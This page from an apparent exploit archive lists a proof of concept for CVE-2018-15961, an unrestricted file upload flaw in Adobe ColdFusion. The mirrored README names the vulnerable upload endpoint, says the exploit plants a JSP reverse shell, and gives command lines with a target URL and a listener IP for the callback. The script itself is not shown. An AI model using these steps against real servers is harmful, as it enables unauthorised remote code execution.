Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2018-15961 PoC — Adobe ColdFusion 代码问题漏洞

Source
https://github.com/xbufu/CVE-2018-15961
Associated Vulnerability
Title:Adobe ColdFusion 代码问题漏洞 (CVE-2018-15961)
Description:Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
Description
Exploit for CVE-2018-15961, a unrestricted file upload vulnerability in Adobe ColdFusion 2018 leading to RCE
Readme
# CVE-2018-15961 - Adobe ColdFusion 2018 RCE

This repository contains my exploit code for the RCE vulnerability in Adobe ColdFusion 2018.

## Exploit Description

The exploit sends a POST request containing a JSP reverse shell to `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm`. If successfull, this uploads the shell to `/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell.jsp`. The code then triggers to shell by sending a simple GET request.

## Usage

```bash
# Basic usage
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443

# With custom filename for the shell
python3 coldfusion_rce.py -u http://172.31.1.15:8500 -l 10.10.0.25 -p 443 -f reverse.jsp
```
File Snapshot

 [4.0K]  /data/pocs/58910c15896233e2611895208d5e6b6cd2b72d4d
├── [4.5K]  coldfusion_rce.py
└── [ 725]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →